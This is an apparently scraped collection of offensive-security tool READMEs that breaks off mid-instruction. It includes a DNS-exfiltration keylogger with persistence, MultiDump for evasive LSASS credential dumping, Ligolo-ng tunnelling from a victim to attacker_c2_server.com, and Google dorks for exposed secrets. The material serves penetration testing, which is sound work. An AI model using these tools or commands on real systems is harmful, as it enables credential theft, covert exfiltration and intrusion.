192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,44 5,57608,SMB Signing not required,2,X
To produce an XLSX format:
$ sr2t --nmap example/nmap.xml -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --nmap example/nmap.xml --nmap-services
Nmap TCP:
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| 192.168.23.78 | X | | X | X | X | X | X | X | | |
| 192.168.27.243 | | | | X | X | | X | X | X | X |
| 192.168.99.164 | | | | X | X | | X | X | X | X |
| 192.168.228.211 | | X | | | | | | | | |
| 192.168.171.74 | | | | X | X | | X | X | X | X |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
Nmap Services:
+-----------------+------+-------+---------------+-------+
| ip address | port | proto | service | state |
+--------------- --+------+-------+---------------+-------+
| 192.168.23.78 | 53 | tcp | domain | open |
| 192.168.23.78 | 88 | tcp | kerberos-sec | open |
| 192.168.23.78 | 135 | tcp | msrpc | open |
| 192.168.23.78 | 139 | tcp | netbios-ssn | open |
| 192.168.23.78 | 389 | tcp | ldap | open |
| 192.168.23.78 | 445 | tcp | microsoft-ds | open |
| 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 135 | tcp | msrpc | open |
| 192.168.27.243 | 139 | tcp | netbios-ssn | open |
| 192.168.27.243 | 445 | tcp | microsoft-ds | open |
| 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 5800 | tcp | vnc-http | open |
| 192.168.27.243 | 5900 | tcp | vnc | open |
| 192.168.99.164 | 135 | tcp | msrpc | open |
| 192.168.99.164 | 139 | tcp | netbios-ssn | open |
| 192 .168.99.164 | 445 | tcp | microsoft-ds | open |
| 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |
| 192.168.99.164 | 5800 | tcp | vnc-http | open |
| 192.168.99.164 | 5900 | tcp | vnc | open |
| 192.168.228.211 | 80 | tcp | http | open |
| 192.168.171.74 | 135 | tcp | msrpc | open |
| 192.168.171.74 | 139 | tcp | netbios-ssn | open |
| 192.168.171.74 | 445 | tcp | microsoft-ds | open |
| 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |
| 192.168.171.74 | 5800 | tcp | vnc-http | open |
| 192.168.171.74 | 5900 | tcp | vnc | open |
+-----------------+------+-------+---------------+-------+
Or to output a CSV file:
$ sr2t --nmap example/nmap.xml -oC example
$ cat example_nmap_tcp.csv
ip address,53,80,88,135,139,389,445,3389,5800,5900
192.168.23.78,X,,X,X,X,X,X,X,,
192.168.27.243,,,,X,X,,X,X,X,X
192.168.99.164,,,,X,X,,X,X,X,X
192.168.228.211,,X,,,,,,,,
192.168.171.74,,,,X,X,,X,X,X,X
To produce an XLSX format:
$ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx
To produce an text tabular format to stdout:
$ sr2t --nikto example/nikto.xml
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| target ip | target hostname | target port | description | annotations |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
| 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
| | | | agent to protect against some forms of XSS | |
| 192.168.178.10 | 192.168.178.10 | 8 0 | The X-Content-Type-Options header is not set. This could allow the user agent to | X |
| | | | render the content of the site in a different fashion to the MIME type | |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
Or to output a CSV file:
$ sr2t --nikto example/nikto.xml -oC example
$ cat example_nikto.csv
target ip,target hostname,target port,description,annotations
192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X
192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS",X
192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type",X
To produce an XLSX format:
$ sr2t --dirble example/dirble.xml -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --dirble example/dirble.xml
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| http://example.org/flv | 0 | 0 | false | false | false | | X |
| http://example.org/hire | 0 | 0 | false | false | false | | X |
| http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |
| http://example.org/print_order | 0 | 0 | false | false | fa lse | | X |
| http://example.org/putty | 0 | 0 | false | false | false | | X |
| http://example.org/receipts | 0 | 0 | false | false | false | | X |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
Or to output a CSV file:
$ sr2t --dirble example/dirble.xml -oC example
$ cat example_dirble.csv
url,code,content len,is directory,is listable,found from listable,redirect url,annotations
http://example.org/flv,0,0,false,false,false,,X
http://example.org/hire,0,0,false,false,false,,X
http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X
http://example.org/print_order,0,0,false,false,false,,X
http://example.org/putty,0,0,false,false,false,,X
http://example.org/receipts,0,0,false,false,false,,X
To produce an XLSX format:
$ sr2t --testssl example/testssl.json -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --testssl example/testssl.json
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
Or to output a CSV file:
$ sr2t --testssl example/testssl.json -oC example
$ cat example_testssl.csv
ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard
rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X
To produce an XLSX format:
$ sr2t --fortify example/fortify.fpr -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --fortify example/fortify.fpr
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| | type | subtype | severity | confidence | annotations |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example5/web.xml:166:166 | J2EE Misconfiguration | Inse cure Transport | 3.0 | 5.0 | X |
| example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
| example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
Or to output a CSV file:
$ sr2t --fortify example/fortify.fpr -oC example
$ cat example_fortify.csv
,type,subtype,severity,confidence,annotations
example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X
WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp
This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.
These tools excel at lightweight exfiltration and persistence, properties which will prevent detection. It uses DNS tunelling/exfiltration to bypass firewalls and avoid detection.
The server uses python3.
To install dependencies, run python3 -m pip install -r requirements.txt
To start the server, run python3 main.py
usage: dns exfiltration server [-h] [-p PORT] ip domain
positional arguments:
ip
domain
options:
-h, --help show this help message and exit
-p PORT, --port PORT port to listen on
By default, the server listens on UDP port 53. Use the -p
flag to specify a different port.
ip
is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.
domain
is the domain to listen for, which should be the domain that the server is authoritative for.
On the registrar, you want to change your domain's namespace to custom DNS.
Point them to two domains, ns1.example.com
and ns2.example.com
.
Add records that make point the namespace domains to your exfiltration server's IP address.
This is the same as setting glue records.
The Linux keylogger is two bash scripts. connection.sh
is used by the logger.sh
script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh
script. It will automatically establish a connection and send the data.
logger.sh
# Usage: logger.sh [-options] domain
# Positional Arguments:
# domain: the domain to send data to
# Options:
# -p path: give path to log file to listen to
# -l: run the logger with warnings and errors printed
To start the keylogger, run the command ./logger.sh [domain] && exit
. This will silently start the keylogger, and any inputs typed will be sent. The && exit
at the end will cause the shell to close on exit
. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null
to display error messages.
The -p
option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/
.
The -l
option will show warnings and errors. Can be useful for debugging.
logger.sh
and connection.sh
must be in the same directory for the keylogger to work. If you want persistance, you can add the command to .profile
to start on every new interactive shell.
connection.sh
Usage: command [-options] domain
Positional Arguments:
domain: the domain to send data to
Options:
-n: number of characters to store before sending a packet
To build keylogging program, run make
in the windows
directory. To build with reduced size and some amount of obfuscation, make the production
target. This will create the build
directory for you and output to a file named logger.exe
in the build
directory.
make production domain=example.com
You can also choose to build the program with debugging by making the debug
target.
make debug domain=example.com
For both targets, you will need to specify the domain the server is listening for.
You can use dig
to send requests to the server:
dig @127.0.0.1 a.1.1.1.example.com A +short
send a connection request to a server on localhost.
dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short
send a test message to localhost.
Replace example.com
with the domain the server is listening for.
A record requests starting with a
indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.
The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].
The server will respond with an IP address in following format: 123.123.123.[id]
Concurrent connections cannot exceed 254, and clients are never considered "disconnected."
A record requests starting with b
indicate exfiltrated data being sent to the server.
The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].
The server will respond with [code].123.123.123
id
is the id that was established on connection. Data is sent as ASCII encoded in hex.
code
is one of the codes described below.
200
: OKIf the client sends a request that is processed normally, the server will respond with code 200
.
201
: Malformed Record RequestsIf the client sends an malformed record request, the server will respond with code 201
.
202
: Non-Existant ConnectionsIf the client sends a data packet with an id greater than the # of connections, the server will respond with code 202
.
203
: Out of Order PacketsIf the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203
. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.
204
Reached Max ConnectionIf the client attempts to create a connection when the max has reached, the server will respond with code 204
.
Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.
The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat
, you should select the appropriate option to print ASCII control characters, such as -v
for cat
, or open it in a text-editor.
The keylogger relies on script
, so the keylogger won't run in non-interactive shells.
For some reason, the Windows Dns_Query_A
always sends duplicate requests. The server will process it fine because it discards repeated packets.
MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.
Blog post: https://xre0us.io/posts/multidump
MultiDump supports LSASS dump via ProcDump.exe
or comsvc.dll
, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.
__ __ _ _ _ _____
| \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __
| |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
| | | | |_| | | |_| | |__| | |_| | | | | | | |_) |
|_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/
|_|
Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]
-p Path to save procdump.exe, use full path. Default to temp directory
-l Path to save encrypted dump file, use full path. Default to current directory
-r Set ip:port to connect to a remote handler
--procdump Writes procdump to disk and use it to dump LSASS
--nodump Disable LSASS dumping
--reg Dump SAM, SECURITY and SYSTEM hives
--delay Increase interval between connections to for slower network speeds
-v Enable v erbose mode
MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.
Examples:
MultiDump.exe -l C:\Users\Public\lsass.dmp -v
MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]
Handler for RemoteProcDump
options:
-h, --help show this help message and exit
-r REMOTE, --remote REMOTE
Port to receive remote dump file
-l LOCAL, --local LOCAL
Local dump file, key needed to decrypt
--sam SAM Local SAM save, key needed to decrypt
--security SECURITY Local SECURITY save, key needed to decrypt
--system SYSTEM Local SYSTEM save, key needed to decrypt
-k KEY, --key KEY Key to decrypt local file
--override-ip OVERRIDE_IP
Manually specify the IP address for key generation in remote mode, for proxied connection
As with all LSASS related tools, Administrator/SeDebugPrivilege priviledges are required.
The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your enviroment. If you see the error All detection methods failed
, it's likely the Pypykatz version is outdated.
By default, MultiDump uses the Comsvc.dll
method and saves the encrypted dump in the current directory.
MultiDump.exe
...
[i] Local Mode Selected. Writing Encrypted Dump File to Disk...
[i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
If --procdump
is used, ProcDump.exe
will be writtern to disk to dump LSASS.
In remote mode, MultiDump connects to the handler's listener.
./ProcDumpHandler.py -r 9001
[i] Listening on port 9001 for encrypted key...
MultiDump.exe -r 10.0.0.1:9001
The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip
option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r
.
An additional option to dump the SAM
, SECURITY
and SYSTEM
hives are available with --reg
, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.
Open in Visual Studio, build in Release mode.
It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them, to do so, another Visual Studio project EncryptionHelper
, is included. Simply change the key or strings and the output of the compiled EncryptionHelper.exe
can be pasted into MultiDump.c
and Common.h
.
Self deletion can be toggled by uncommenting the following line in Common.h
:
#define SELF_DELETION
To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h
:
//#define DEBUG
MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of), the investigation and implementation deserves a blog post itself: https://xre0us.io/posts/saving-lsass-from-defender/
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.
jython-standalone-2.7.3.jar
.java -jar jython-standalone-2.7.3.jar -m ensurepip
.GAP.py
and requirements.txt
from this project and place in the same directory.java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt
.Or you can right click a request or response in any other context and select GAP from the Extensions menu.
If you don't need one of the modes, then un-check it as results will be quicker.
If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run for one or two target in the Site Map view at a time, as huge projects can have consume a lot of resources.
If you want to run GAP on one of more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.
It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl
button and click the GAP logo header image to remove it to make more space.
The Words mode uses the beautifulsoup4
library and this can be quite slow, so be patient!
Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.
NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.
Tentaive
Issues, e.g. Parameters that were found in the Response (but not as query parameters in links found).beautifulsoup4
that is faster to parse responses for Words.Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! β (I could use the caffeine!)
π€ /XNL-h4ck3r
mapXplore is a modular application that imports data extracted of the sqlmap to PostgreSQL or SQLite database.
Its main features are:
Automatic export of information stored in base64, such as:
Filter tables and columns by criteria.
git clone https://github.com/daniel2005d/mapXplore
cd mapXplore
pip install -r requirements
It is a modular application, and consists of the following:
Allows loading a default configuration at the start of the program
python engine.py [--config config.json]
A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting
site:example.com -www -shop -share -ir -mfa
site:example.com ext:php inurl:?
site:openbugbounty.org inurl:reports intext:"example.com"
site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess
inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example.com
inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com
inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example.com
inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example.com
inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example.com
inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example.com
inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php site:example[.]com
inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:example[.]com
inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"example[.]com"
site:pastebin.com "example.com"
site:jsfiddle.net "example.com"
site:codebeautify.org "example.com"
site:codepen.io "example.com"
site:s3.amazonaws.com "example.com"
site:blob.core.windows.net "example.com"
site:googleapis.com "example.com"
site:drive.google.com "example.com"
site:dev.azure.com "example[.]com"
site:onedrive.live.com "example[.]com"
site:digitaloceanspaces.com "example[.]com"
site:sharepoint.com "example[.]com"
site:s3-external-1.amazonaws.com "example[.]com"
site:s3.dualstack.us-east-1.amazonaws.com "example[.]com"
site:dropbox.com/s "example[.]com"
site:box.com/s "example[.]com"
site:docs.google.com inurl:"/d/" "example[.]com"
site:jfrog.io "example[.]com"
site:firebaseio.com "example[.]com"
site:example.com "choose file"
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"
site:*/security.txt "bounty"
site:*/server-status apache
inurl:/wp-admin/admin-ajax.php
intext:"Powered by" & intext:Drupal & inurl:user
site:*/joomla/login
Medium articles for more dorks:
https://thegrayarea.tech/5-google-dorks-every-hacker-needs-to-know-fed21022a906
https://infosecwriteups.com/uncover-hidden-gems-in-the-cloud-with-google-dorks-8621e56a329d
https://infosecwriteups.com/10-google-dorks-for-sensitive-data-9454b09edc12
Top Parameters:
https://github.com/lutfumertceylan/top25-parameter
Proviesec dorks:
https://github.com/Proviesec/google-dorks
GTFOcli
it's a Command Line Interface for easy binaries search commands that can be used to bypass local security restrictions in misconfigured systems.
Using go
:
go install github.com/cmd-tools/gtfocli@latest
Using homebrew
:
brew tap cmd-tools/homebrew-tap
brew install gtfocli
Using docker
:
docker pull cmdtoolsowner/gtfocli
Search for binary tar
:
gtfocli search tar
Search for binary tar
from stdin
:
echo "tar" | gtfocli search
Search for binaries located into file;
cat myBinaryList.txt
/bin/bash
/bin/sh
tar
arp
/bin/tail
gtfocli search -f myBinaryList.txt
Search for binary Winget.exe
:
gtfocli search Winget --os windows
Search for binary Winget
from stdin
:
echo "Winget" | gtfocli search --os windows
Search for binaries located into file:
cat windowsExecutableList.txt
Winget
c:\\Users\\Desktop\\Ssh
Stordiag
Bash
c:\\Users\\Runonce.exe
Cmdkey
c:\dir\subDir\Users\Certreq.exe
gtfocli search -f windowsExecutableList.txt --os windows
Search for binary Winget
and print output in yaml
format (see -h
for available formats):
gtfocli search Winget -o yaml --os windows
Examples:
Search for binary Winget
and print output in yaml
format:
docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows
Search for binary tar
and print output in json
format:
echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json
Search for binaries located into file mounted as volume in the container:
cat myBinaryList.txt
/bin/bash
/bin/sh
tar
arp
/bin/tail
docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt
An example of common use case for gtfocli
is together with find
:
find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null
or
find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search
Thanks to GTFOBins and LOLBAS, without these projects gtfocli
would never have come to light.
You want to contribute to this project? Wow, thanks! So please just fork it and send a pull request.
The summary of the changelog since the 2023.4 release from December is:
SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.
Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.
SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.
Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:
Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.
Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.
Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.
Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.
Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.
Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.
By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.
SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.
To use SwaggerSpy, follow these steps:
git clone https://github.com/UndeadSec/SwaggerSpy.git
cd SwaggerSpy
pip install -r requirements.txt
python swaggerspy.py searchterm
SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.
Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.
SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)
I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.
SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.
Special thanks to @Liodeus for providing project inspiration through swaggerHole.
navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities
Currently, navgix supports 2 techniques for finding vulnerable directories (or location aliases). Those being the following:
navgix will make an initial GET request to the page, and if there are any directories specified on the page HTML (specified in src attributes on html components), it will test each folder in the path for the vulnerability, therefore if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.
navgix will also test for a short list of common directories that are common to have this vulnerability and if any of these directories exist, it will also attempt to confirm if a vulnerability is present.
git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
go build
Nemesis is an offensive data enrichment pipeline and operator support system.
Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.
Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operatorsβ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.
See the setup instructions.
See development.md
Post Name | Publication Date | Link |
---|---|---|
Hacking With Your Nemesis | Aug 9, 2023 | https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4 |
Challenges In Post-Exploitation Workflows | Aug 2, 2023 | https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9 |
On (Structured) Data | Jul 26, 2023 | https://posts.specterops.io/on-structured-data-707b7d9876c6 |
Nemesis is built on large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we're forgotten proper credit anywhere, please let us know or submit a pull request!
We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
As an example, for a TCP connection:
This allows running tools like nmap without the use of proxychains (simpler and faster).
Precompiled binaries (Windows/Linux/macOS) are available on the Release page.
Building ligolo-ng (Go >= 1.20 is required):
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
When using Linux, you need to create a tun interface on the Proxy Server (C2):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
You need to download the Wintun driver (used by WireGuard) and place the wintun.dll
in the same folder as Ligolo (make sure you use the right architecture).
Start the proxy server on your Command and Control (C2) server (default port 11601):
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
When using the -autocert
option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.
Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval
If you want to use your own certificates for the proxy server, you can use the -certfile
and -keyfile
parameters.
The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert
option.
The -ignore-cert
option needs to be used with the agent.
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the
--socks ip:port
option. You can specify SOCKS credentials using the--socks-user
and--socks-pass
arguments.
A session should appear on the proxy server.
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
Use the session
command to select the agent.
ligolo-ng Β» session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
Display the network configuration of the agent using the ifconfig
command:
[Agent : nchatelain@nworkstation] Β» ifconfig
[...]
βββββββββββββββββββββββββββββββββββββββββββββββ
β Interface 3 β
ββββββββββββββββ¬βββββββββββββββββββββββββββββββ€
β Name β wlp3s0 β
β Hardware MAC β de:ad:be:ef:ca:fe β
β MTU β 1500 β
β Flags β up|broadcast|multicast β
β IPv4 Address β 192.168.0.30/24 β
ββββββββββββββββ΄βββββββββββββββββββββββββββββββ
Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.
Linux:
